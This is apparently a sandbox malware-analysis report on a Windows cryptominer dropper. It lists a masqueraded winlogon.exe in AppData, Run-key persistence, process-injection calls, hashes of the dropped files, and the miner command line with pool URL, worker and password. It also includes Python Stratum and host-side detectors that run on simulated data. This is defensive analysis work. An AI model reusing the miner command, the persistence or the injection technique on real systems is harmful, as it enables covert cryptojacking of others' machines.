Analysis
- max time kernel: 94s
- max time network: 158s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 20-05-2022 03:28

Tasks
- Static task: static1
- Behavioral task: behavioral1, sample a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe, resource win7-20220414-en
- Behavioral task: behavioral2, sample a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe, resource win10v2004-20220414-en

The results below are for the windows10-2004_x64 / win10v2004-20220414-en run listed in the header.
General
- Target: a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe
- Size: 5.5MB
- MD5: 59d3d2406da9ec9591a7f5064375603c
- SHA1: a43f3d2ebfdf2700edec93c1aa3e8d7e529a0294
- SHA256: a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d
- SHA512: 233c715a750e159deb27c1e0d57856d47f8e7ab118933749bf8167abe3f3611fc094bf53584e708e5b34b224435f71ffcf3c85b85f7a00aeb917968b4e5dfad5
Signatures
- Detected Stratum cryptominer command: looks to be attempting to contact a Stratum mining pool. The command line under Processes names the pool (stratum+tcp://hash-to-coins.com:3333), the worker (no3kah.trol), the password (trol) and the algorithm (scrypt); these are the usable network and host indicators from this run.
- Executes dropped EXE (2 IoCs): winlogon.exe, PID 2132 and PID 396.
- Loads dropped DLL (12 IoCs): winlogon.exe PID 2132 (6 loads) and PID 396 (6 loads). The dropped DLLs on this page are the OpenSSL (LIBEAY32/SSLEAY32), libcurl-4, zlib1, libwinpthread-1 and OpenCL libraries listed under Downloads, i.e. the runtime a stock miner build needs for pool TLS/HTTP and GPU mining.
- Adds Run key to start application (2 TTPs, 2 IoCs), by a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe (PID 1872):
  - Key created: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows\CurrentVersion\Run
  - Set value (str): \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Users\\Admin\\AppData\\Roaming\\winlogon\\winlogonservice.exe\" "
  Note that the Run value points at winlogonservice.exe, while the binary dropped and executed in this run is winlogon.exe in the same directory, and no winlogonservice.exe appears among the dropped files. As recorded, the persistence entry would not relaunch the observed miner unless that file is written later or by another component, so treat both file names as indicators.
- Suspicious use of SetThreadContext (2 IoCs): PID 1872 (a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe) set the thread context of PID 2132 and of PID 396 (both winlogon.exe).
- Suspicious behavior: EnumeratesProcesses (8 IoCs): PID 1872 (a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe), 8 occurrences.
- Suspicious use of WriteProcessMemory (25 IoCs): PID 1872 (a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe) wrote to the memory of PID 2132 (13 times) and of PID 396 (12 times), both winlogon.exe.
  SetThreadContext together with repeated WriteProcessMemory from a parent into children it has just created is the classic process-hollowing / injection pattern. The memory dumps at the end of this page support that reading: the two instances of the same 30KB winlogon.exe have image regions of 220KB and 1.1MB, consistent with the parent writing a different payload into each child rather than the on-disk file running as-is.
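What the Stratum signature corresponds to on the wire, as an added example that is not part of this report or of the sample: Stratum v1 is newline-delimited JSON-RPC over TCP, and a miner opens with mining.subscribe followed by mining.authorize, which carries the worker and password in clear. The pool host and port, worker and password below are the ones from the miner command line on this page; the agent string, the pool-side responses and the difficulty value are constructed stand-ins, and no connection is made.

```python
import json

# Values from the miner command line in the report (-o, -u, -p).
POOL_HOST, POOL_PORT = "hash-to-coins.com", 3333
WORKER, PASSWORD = "no3kah.trol", "trol"

# Stratum v1 method names a sensor should recognise in either direction.
STRATUM_METHODS = {
    "mining.subscribe", "mining.authorize", "mining.submit",
    "mining.notify", "mining.set_difficulty", "mining.extranonce.subscribe",
}


def encode(msg):
    """Stratum v1 frames one JSON-RPC object per line, newline-terminated."""
    return (json.dumps(msg, separators=(",", ":")) + "\n").encode()


def client_handshake(worker, password, agent="example-miner/0.0"):
    """The first two requests a miner sends. The agent string is an assumption;
    the report does not show which miner binary this is."""
    return [
        {"id": 1, "method": "mining.subscribe", "params": [agent]},
        {"id": 2, "method": "mining.authorize", "params": [worker, password]},
    ]


def fake_pool(request):
    """Constructed stand-in for the pool side; no socket is opened."""
    if request["method"] == "mining.subscribe":
        # result: [subscriptions, extranonce1, extranonce2_size]
        return {"id": request["id"], "error": None,
                "result": [[["mining.set_difficulty", "deadbeef01"],
                            ["mining.notify", "deadbeef02"]], "08000002", 4]}
    if request["method"] == "mining.authorize":
        return {"id": request["id"], "error": None, "result": True}
    return {"id": request["id"], "error": [20, "unknown method", None], "result": None}


def simulate_session(worker, password):
    """Return (bytes the miner sends to the pool, bytes the pool sends back)."""
    to_pool, from_pool = b"", b""
    for req in client_handshake(worker, password):
        to_pool += encode(req)
        from_pool += encode(fake_pool(req))
    # After authorisation a pool pushes work; difficulty first (constructed value).
    from_pool += encode({"id": None, "method": "mining.set_difficulty", "params": [512]})
    return to_pool, from_pool


def detect_stratum(payload):
    """Network-side check over a reassembled TCP stream: return the Stratum
    methods seen, and the worker/password when mining.authorize is present."""
    hits = []
    for line in payload.split(b"\n"):
        line = line.strip()
        if not line.startswith(b"{"):
            continue  # not JSON-RPC (e.g. HTTP); no false match on plain text
        try:
            obj = json.loads(line)
        except ValueError:
            continue
        method = obj.get("method") if isinstance(obj, dict) else None
        if method not in STRATUM_METHODS:
            continue
        hit = {"method": method}
        params = obj.get("params") or []
        if method == "mining.authorize" and len(params) >= 2:
            hit["worker"], hit["password"] = params[0], params[1]
        hits.append(hit)
    return hits


if __name__ == "__main__":
    to_pool, from_pool = simulate_session(WORKER, PASSWORD)
    print(to_pool.decode(), end="")
    for hit in detect_stratum(to_pool):
        print("client ->", hit)
    for hit in detect_stratum(from_pool):
        print("pool   ->", hit)
```

The detector assumes it is handed a reassembled stream; splitting raw segments on newlines will miss frames that straddle a segment boundary. Matching on method names only works for stratum+tcp. A stratum+ssl pool hides the JSON, leaving a network sensor with the destination host, port and TLS metadata, which is why the host-side command-line indicator (pool URL, -u worker, -p password) is the more robust of the two.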
Processes
1. C:\Users\Admin\AppData\Local\Temp\a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe (PID 1872)
   Command line: "C:\Users\Admin\AppData\Local\Temp\a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe"
   - Adds Run key to start application
   - Suspicious use of SetThreadContext
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of WriteProcessMemory
   2. C:\Users\Admin\AppData\Roaming\winlogon\winlogon.exe
      Command line: --scrypt -o stratum+tcp://hash-to-coins.com:3333 -u no3kah.trol -p trol
      - Executes dropped EXE
      - Loads dropped DLL
   2. C:\Users\Admin\AppData\Roaming\winlogon\winlogon.exe
      Command line: --scrypt -o stratum+tcp://hash-to-coins.com:3333 -u no3kah.trol -p trol
      - Executes dropped EXE
      - Loads dropped DLL

The two children (PIDs 2132 and 396 in the signatures above) borrow the name of the Windows logon process but run from %APPDATA%\winlogon rather than C:\Windows\System32, and each is started with a scrypt miner command line (-o pool URL, -u worker, -p password). An image named winlogon.exe running from anywhere other than the system directories is a reliable hunt condition on its own; the pool URL and worker name in the command line are the confirmation.
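A host-side detector for what the tree above shows, as an added example that is not part of this report or of the sample. It runs over constructed telemetry modelled on this run: the PIDs, paths, command lines and Run value are taken from the report, the event-record layout is an assumption rather than any EDR's real schema, and a System32 winlogon.exe row is included as a benign control. It flags the Stratum command line, the system-process name outside System32, the Run value pointing into a user-writable directory, and the report's own oddity that the Run value names a file never observed executing.

```python
import re
from pathlib import PureWindowsPath
from urllib.parse import urlparse

SAMPLE = "a6afd676687acf2d56ec65844e8543dd528b310e2b977c394824a2ca96b23e3d.exe"
RUN_VALUE = (r"\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000"
             r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon")

# Constructed telemetry modelled on the run above. PIDs, paths, command lines and
# the Run value come from the report; the record layout is an assumption, not any
# EDR's real schema, and the System32 winlogon.exe row is a benign control.
EVENTS = [
    {"type": "process", "pid": 1872, "ppid": None,
     "image": r"C:\Users\Admin\AppData\Local\Temp" + "\\" + SAMPLE,
     "cmdline": '"C:\\Users\\Admin\\AppData\\Local\\Temp\\' + SAMPLE + '"'},
    {"type": "process", "pid": 2132, "ppid": 1872,
     "image": r"C:\Users\Admin\AppData\Roaming\winlogon\winlogon.exe",
     "cmdline": "--scrypt -o stratum+tcp://hash-to-coins.com:3333 -u no3kah.trol -p trol"},
    {"type": "process", "pid": 396, "ppid": 1872,
     "image": r"C:\Users\Admin\AppData\Roaming\winlogon\winlogon.exe",
     "cmdline": "--scrypt -o stratum+tcp://hash-to-coins.com:3333 -u no3kah.trol -p trol"},
    {"type": "registry", "pid": 1872, "key": RUN_VALUE,
     "value": '"C:\\Users\\Admin\\AppData\\Roaming\\winlogon\\winlogonservice.exe" '},
    {"type": "process", "pid": 700, "ppid": 600,
     "image": r"C:\Windows\System32\winlogon.exe", "cmdline": "winlogon.exe"},
]

STRATUM_URL = re.compile(r"stratum\+(?:tcp|ssl|tls)://[^\s\"']+", re.IGNORECASE)
# Core Windows process names that legitimately live only under the system directories.
SYSTEM_IMAGE_NAMES = {"winlogon.exe", "csrss.exe", "lsass.exe", "services.exe",
                      "smss.exe", "svchost.exe", "wininit.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\users\\public\\")
KNOWN_LONG_OPTIONS = {"--url", "--user", "--pass", "--userpass", "--threads", "--algo"}


def parse_stratum(cmdline):
    """Pool, worker and algorithm from a miner command line, or None if no Stratum URL."""
    m = STRATUM_URL.search(cmdline)
    if not m:
        return None
    url = urlparse(m.group(0))
    tokens = cmdline.split()

    def flag(*names):
        for i, tok in enumerate(tokens[:-1]):
            if tok in names:
                return tokens[i + 1]
        return None

    algo = flag("-a", "--algo")
    if algo is None:  # e.g. "--scrypt": the algorithm given as a bare long option
        algo = next((t.lstrip("-") for t in tokens
                     if t.startswith("--") and t not in KNOWN_LONG_OPTIONS), None)
    return {"pool": url.hostname, "port": url.port, "worker": flag("-u", "--user"),
            "password": flag("-p", "--pass"), "algorithm": algo}


def is_masquerading_system_image(image):
    """A core system process name running from anywhere but the system directories."""
    p = PureWindowsPath(image)
    if p.name.lower() not in SYSTEM_IMAGE_NAMES:
        return False
    return str(p.parent).lower() not in SYSTEM_DIRS


def run_value_target(value):
    """Executable path from a Run value such as '"C:\\dir\\x.exe" args'."""
    v = value.strip()
    if v.startswith('"') and v.find('"', 1) > 0:
        return v[1:v.find('"', 1)]
    return v.split()[0] if v else ""


def is_user_writable_path(path):
    return any(marker in path.lower() for marker in USER_WRITABLE_MARKERS)


def analyse(events):
    """Return (rule, pid, detail) findings over a list of events."""
    findings = []
    executed = {e["image"].lower() for e in events if e["type"] == "process"}
    for e in events:
        if e["type"] == "process":
            pool = parse_stratum(e["cmdline"])
            if pool:
                findings.append(("stratum_miner_cmdline", e["pid"], pool))
            if is_masquerading_system_image(e["image"]):
                findings.append(("system_name_outside_system_dir", e["pid"], e["image"]))
        elif e["type"] == "registry" and "\\currentversion\\run\\" in e["key"].lower():
            target = run_value_target(e["value"])
            if is_user_writable_path(target):
                findings.append(("run_key_user_writable_target", e["pid"], target))
            if target.lower() not in executed:
                # The report's own oddity: persistence names winlogonservice.exe,
                # but only winlogon.exe was seen running.
                findings.append(("run_key_target_not_observed_executing", e["pid"], target))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in analyse(EVENTS):
        print(f"{rule:40} pid={pid} {detail}")
```

On the constructed events the sample itself (PID 1872) is flagged only through its registry write; the two winlogon.exe children each produce a Stratum finding and a masquerade finding, and the System32 control produces nothing. The path check is deliberately by directory rather than by hash, because the dropped winlogon.exe is a 30KB host binary and, per the signatures above, the code that actually runs is written into it by the parent.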
Downloads (dropped files, all written to C:\Users\Admin\AppData\Roaming\winlogon)
- C:\Users\Admin\AppData\Roaming\winlogon\LIBEAY32.dll (also recorded as libeay32.dll), 1.6MB
  MD5: 9462cb83718ccab3c744f0f5561a289d
  SHA1: d716496ea6b6354e2cab9337e6b631603bba80e5
  SHA256: f08009f941680657077fff1c8d58fac8affa2216b3a478312ac48948c228c73a
  SHA512: 9b54abd361f36c89884973a86d51b251db06738bb033e7afba55839b4b9624b30836df41cd4d69e715317bacd86fd546a0256cff858aa90b69669c3b0e834beb
- C:\Users\Admin\AppData\Roaming\winlogon\OpenCL.dll, 56KB
  MD5: c4f271897205db916f46ce88f910eb5b
  SHA1: 6223d0d1146c8c3624bdb0db7576c5e915ead8a7
  SHA256: 9ae4be443b4c1bca28f3f5722756ef12a8c480c73d55020b253264dce801b772
  SHA512: cc2c64bb37c2ccfe675031ddc962165fa313970f1f6c9721b3eab7110efde2fd7ab56720c6c0b83f067c85bc446ded3701d8777f0adcae835e36d20ca58d7622
- C:\Users\Admin\AppData\Roaming\winlogon\SSLEAY32.dll (also recorded as ssleay32.dll), 356KB
  MD5: 5935940918fa77c777fcd0475149a217
  SHA1: 8795761c41b59e6352e0f24cb385f88076a08491
  SHA256: ed0b0f0d40c902703e212279f99c6dcf403eb75eba4abb058cb39129d09a6467
  SHA512: 44c076642b531e5e39280f52bab229795f25f87defb523594750313d1b8192124430606d1d701ac56224de26eed7c76d2347780be29c94c119822a44939c6d16
- C:\Users\Admin\AppData\Roaming\winlogon\libcurl-4.dll, 525KB
  MD5: 48131a7c1cd5bce34da3eda489a81158
  SHA1: 9e9b021b245464c81620ec1af765198471b538c7
  SHA256: a899458036e4cbf1b13f755fb1c65b6a63e537ee72aefa569a9dea590e8d3ff6
  SHA512: 6ddced7c460901ff440247001bae266e88286389d26aba09f3afbd9d9e66d89a1c6251c145da622afda66f43bcd4e9e6acfbc695513fd704ba23c26160c53d11
- C:\Users\Admin\AppData\Roaming\winlogon\libwinpthread-1.dll, 70KB
  MD5: 7a2008c80f306eed0b8152b584e8153c
  SHA1: b25f02add9743fff215523ec4c935c5526522243
  SHA256: dd04524dd4220a868c6e35183f6284bbf7cd1fa9273d85636239e0fc3ac245e4
  SHA512: 02f23b01954e53a3c2c2a4940150abe2b0952b3d2b00b7cc93bd179c59eaf39d11ff2dd53b5a9928a4dd0fe52afb6b8162d794c09c141e9e046b5a674f428c2c
- C:\Users\Admin\AppData\Roaming\winlogon\winlogon.exe, 30KB
  MD5: 7257652bada64cfcfb81fc671b8b6c67
  SHA1: c4db7ba1fa0ae7d9b558f25670a61f0d6144c420
  SHA256: a25a414c34475199a1a75408d02e973f2d02c8c711828d942243278786b452be
  SHA512: c438383287b204f9ca41d819edbba7bbf6cfd3476a39031e66531f9c4f2d52ff53201bad54f0c1af6f5d957fba5bf5f0f79f992ea4d4727ef8a5444bddda7155
- C:\Users\Admin\AppData\Roaming\winlogon\zlib1.dll, 83KB
  MD5: 15d6af5c659fe2d9524dd9a90a674d02
  SHA1: 33d2f481b71a82bf4051296957ff327e50bfb033
  SHA256: aad5344650f7ab0a0a396f518f7ef827b8773748220d9e48d28fe4bc7888eb0c
  SHA512: 776c4ace3f6beb64ebface2bf513d24b56484278feca7c5a474da9765b201202cd503f0bfe100c84c28dfda7d2e5edb14c950b22b6c79512a34f3418de544377
Memory dumps
- memory/396-133-0x0000000000000000-mapping.dmp
- memory/396-134-0x0000000000400000-0x0000000000437000-memory.dmp, 220KB
- memory/396-149-0x0000000000400000-0x0000000000437000-memory.dmp, 220KB
- memory/396-160-0x0000000000400000-0x0000000000437000-memory.dmp, 220KB
- memory/2132-130-0x0000000000000000-mapping.dmp
- memory/2132-131-0x0000000000400000-0x000000000051E000-memory.dmp, 1.1MB
- memory/2132-145-0x0000000000400000-0x000000000051E000-memory.dmp, 1.1MB
- memory/2132-159-0x0000000000400000-0x000000000051E000-memory.dmp, 1.1MB

Both PIDs are instances of the same 30KB winlogon.exe, yet their image regions at 0x400000 differ in extent: 0x37000 bytes (220KB) for PID 396 and 0x11E000 bytes (1.1MB) for PID 2132. Together with the SetThreadContext and WriteProcessMemory calls from the parent recorded above, this is consistent with the dropped winlogon.exe serving as a host process into which the sample writes the real payload, so the miner code is more likely to be found in these dumps than in the 30KB file on disk.